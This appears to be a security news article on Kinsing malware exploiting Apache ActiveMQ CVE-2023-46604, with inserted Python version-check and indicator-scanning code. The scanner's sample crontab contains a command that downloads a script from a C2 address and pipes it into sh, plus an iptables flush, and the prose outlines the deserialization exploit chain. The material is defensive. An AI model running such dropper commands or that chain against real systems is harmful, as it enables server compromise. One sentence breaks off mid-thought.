Apache ActiveMQ Vulnerability Exploited by Kinsing to Attack Linux Servers
Threat actors have been actively targeting a vulnerability in Apache ActiveMQ to gain unauthorized access to messaging systems, with data theft and full system compromise as possible outcomes.
The flaw, tracked as CVE-2023-46604, can also be abused to disrupt messaging, cause service outages, and deploy ransomware such as HelloKitty.
Cybersecurity researchers at Sekoia have now identified the Kinsing malware actively exploiting CVE-2023-46604 to compromise Linux servers.
Apache ActiveMQ Vulnerability Exploited
The vulnerability was disclosed on October 27, 2023. It sits in the OpenWire protocol module, carries a critical CVSS v3 score of 9.8, and allows an unauthenticated remote attacker to execute arbitrary code on the broker.
The root cause is missing validation during deserialization, specifically in ExceptionResponseMarshaller: when an ExceptionResponse command is unmarshalled, the broker instantiates whatever Throwable class name the attacker supplies and passes an attacker-controlled string to its constructor.
Pointing that at Spring's ClassPathXmlApplicationContext with the URL of an attacker-hosted XML bean definition makes the broker fetch and evaluate the file, which yields code execution. Metasploit and other public proofs of concept use exactly this chain.
Patches were released on October 28, 2023; affected users should update to one of the following fixed versions:
5.15.16
5.16.7
5.17.6
5.18.3
If updating immediately is not feasible, block access to the OpenWire listener (TCP port 61616 by default) from the Internet; this removes the remote exploitation path until the patch can be applied.
Sekoia researchers deployed honeypots worldwide running the vulnerable ActiveMQ 5.17.5, with each host monitored by the Sekoia Linux agent and the Suricata IDS.
The honeypots went live on 9 November 2023, and the first Kinsing intrusion was recorded on 11 November. From 12 November onward, two to three Kinsing intrusions were observed per day, all launched from the following two IP addresses:
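As an added example (not code from Sekoia or the article), the check a practitioner would run before and after patching, in Python: it reads the WireFormatInfo greeting an ActiveMQ broker sends on the OpenWire port, pulls the ProviderVersion string out of the greeting's property map, and compares it against the fixed versions listed above. The probe_broker host/port arguments and the frame produced by build_sample_frame are assumptions for illustration; the parser relies only on the property-map encoding (writeUTF key, type byte 9, writeUTF value), which is the string public version checks also look for in the greeting.

```python
import re
import socket
import struct

# Fixed patch levels per 5.x branch, from the advisory versions listed above.
FIXED_PATCH = {15: 16, 16: 7, 17: 6, 18: 3}

STRING_TYPE = 9  # OpenWire MarshallingSupport type tag for a String value


def extract_provider_version(frame: bytes):
    """Pull the ProviderVersion string out of a raw WireFormatInfo frame.

    The broker's marshalled properties encode each String property as
    writeUTF(key), one type byte (9 == STRING_TYPE), writeUTF(value), where
    writeUTF is a 2-byte big-endian length followed by the UTF-8 bytes.
    Returns None if the key is absent or the bytes after it do not fit.
    """
    key = b"ProviderVersion"
    idx = frame.find(key)
    if idx < 0:
        return None
    pos = idx + len(key)
    if pos + 3 > len(frame) or frame[pos] != STRING_TYPE:
        return None
    (length,) = struct.unpack(">H", frame[pos + 1:pos + 3])
    value = frame[pos + 3:pos + 3 + length]
    if len(value) != length:
        return None
    return value.decode("utf-8", errors="replace")


def is_vulnerable(version: str) -> bool:
    """True if the reported version is below the fix for its branch."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unparseable ActiveMQ version: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    if major != 5:
        # Assumption: releases after 5.18.3 (6.x) carry the fix; pre-5.x do not.
        return major < 5
    if minor < 15:
        return True  # no fixed release exists for 5.14 and earlier
    if minor > 18:
        return False
    return patch < FIXED_PATCH[minor]


def write_utf(s: str) -> bytes:
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def build_sample_frame(version: str) -> bytes:
    """Constructed test input: a broker greeting carrying the given version.

    Only the property-map bytes are claimed to be exact; the leading header
    (command type, magic, wire version, non-null flag, map length) is
    illustrative so the sample looks like a real frame on the wire.
    """
    props = {"ProviderName": "ActiveMQ", "ProviderVersion": version}
    body = struct.pack(">I", len(props))
    for k, v in props.items():
        body += write_utf(k) + bytes([STRING_TYPE]) + write_utf(v)
    payload = (b"\x01" + b"ActiveMQ" + struct.pack(">I", 12) + b"\x01"
               + struct.pack(">I", len(body)) + body)
    return struct.pack(">I", len(payload)) + payload


def probe_broker(host: str, port: int = 61616, timeout: float = 5.0):
    """Connect to an OpenWire listener and read the broker's greeting.

    The broker sends its WireFormatInfo first, so nothing is written.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        header = s.recv(4)
        if len(header) < 4:
            return None
        (length,) = struct.unpack(">I", header)
        data = b""
        while len(data) < length:
            chunk = s.recv(min(4096, length - len(data)))
            if not chunk:
                break
            data += chunk
        return extract_provider_version(data)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 61616
        v = probe_broker(sys.argv[1], port)
    else:
        v = extract_provider_version(build_sample_frame("5.17.5"))
    print(v, "VULNERABLE" if v and is_vulnerable(v) else "patched/unknown")
```

Run it with a host (and optional port) to probe a real broker, or with no arguments to exercise the constructed frame. Treat a "patched" result as necessary but not sufficient: the banner proves the broker version, not that OpenWire is unreachable from the Internet, and a broker that still answers on 61616 from untrusted networks should be firewalled regardless.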
109.237.96[.]124
78.153.140[.]30
Kinsing infrastructure (Source – Sekoia)
Actions Performed by Kinsing Malware
The Kinsing infection chain performs the following actions on a compromised host:
Install a rootkit
Remove competing malware and miners
Download and execute additional payloads
Establish persistence
Remove firewall rules
Set up a crontab
Overview of the Kinsing Exploitation OpenWire traffic (Source – Sekoia)
Kinsing malware characteristics
Key characteristics of the Kinsing sample analysed:
SHA256 hash: 787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c
Size: 5.69 MBytes
File: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Compiler: Go1.17.13
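As an added example (not from the article or Sekoia) of turning the indicators on this page into a host check, in Python: it scans crontab text for the download-and-pipe-to-shell and firewall-flush behaviour listed under the Kinsing actions, matches the two Sekoia source addresses in connection logs, and compares file contents against the sample SHA256. The crontab and log lines are constructed for illustration, and the regexes are generic cryptominer-dropper idioms rather than Kinsing-specific signatures.

```python
import hashlib
import re

# Indicators quoted in the Sekoia findings above (the article defangs the IPs with [.]).
KINSING_C2_IPS = {"109.237.96.124", "78.153.140.30"}
KINSING_SHA256 = "787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c"

# Behavioural patterns for the cron and firewall actions listed above.
# Assumption: generic dropper idioms, not signatures taken from Kinsing itself.
DOWNLOAD_EXEC = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sh|bash)\b")
FIREWALL_FLUSH = re.compile(r"\biptables\b.*\s-[FX]\b|\bufw\s+disable\b")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def c2_ips_in(text: str) -> list:
    """Known Kinsing source addresses present in the text, sorted."""
    return sorted(set(IPV4.findall(text)) & KINSING_C2_IPS)


def classify_cron_line(line: str) -> list:
    """Label one crontab entry; an empty list means nothing suspicious."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    findings = []
    if DOWNLOAD_EXEC.search(line):
        findings.append("download-and-exec")
    if FIREWALL_FLUSH.search(line):
        findings.append("firewall-flush")
    for ip in c2_ips_in(line):
        findings.append("c2-ip:" + ip)
    return findings


def scan_crontab(text: str) -> dict:
    """Map 1-based line numbers to findings for every flagged crontab entry."""
    result = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        findings = classify_cron_line(line)
        if findings:
            result[lineno] = findings
    return result


def scan_connection_log(text: str) -> list:
    """Known Kinsing addresses contacted according to a connection log."""
    return c2_ips_in(text)


def sha256_matches_sample(data: bytes) -> bool:
    return hashlib.sha256(data).hexdigest() == KINSING_SHA256


def file_matches_sample(path: str) -> bool:
    """Hash a file on disk and compare it with the Kinsing sample hash."""
    with open(path, "rb") as f:
        return sha256_matches_sample(f.read())


# Constructed inputs: one benign cron entry and two suspicious ones, plus a
# short connection log with one contact to a listed address.
SAMPLE_CRONTAB = """\
# constructed crontab for illustration
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * wget -q -O - http://109.237.96.124/script.sh | sh > /dev/null 2>&1
*/5 * * * * iptables -F && iptables -X
"""

SAMPLE_CONN_LOG = """\
2023-11-12T02:14:07Z src=10.0.0.5 dst=78.153.140.30 dport=80 proto=tcp
2023-11-12T02:14:09Z src=10.0.0.5 dst=10.0.0.20 dport=443 proto=tcp
"""

if __name__ == "__main__":
    for lineno, findings in scan_crontab(SAMPLE_CRONTAB).items():
        print(f"crontab line {lineno}: {', '.join(findings)}")
    print("C2 contacts in log:", scan_connection_log(SAMPLE_CONN_LOG))
```

On a real host, feed scan_crontab the output of `crontab -l` for each user plus the files under /etc/cron.d, and point file_matches_sample at binaries found running from /tmp or other writable paths. The hash check only catches this exact sample; the cron and firewall patterns are what survive a recompile.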
Functions
The binary contains over 60 functions; a few notable names are:
getActiveC2Url
POST on /mu
POST on /ki
GET on /get
massscan
redisBrute
The deployed cryptominer is XMRig, packed with UPX and carrying its configuration embedded. Once decompressed, it reveals a Monero wallet (46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb) and a nanopool.org pool URL.
However, this wallet has been inactive since November 2019. Public CTI reports link this wallet to Kinsing, but it’s
These intrusions underline how important it is to apply security updates quickly and to keep tight control over exposed services, particularly dockerised ones, where a vulnerable image can keep running long after a fix is available.
The post Apache ActiveMQ Vulnerability Exploited by Kinsing to Attack Linux Servers appeared first on Cyber Security News.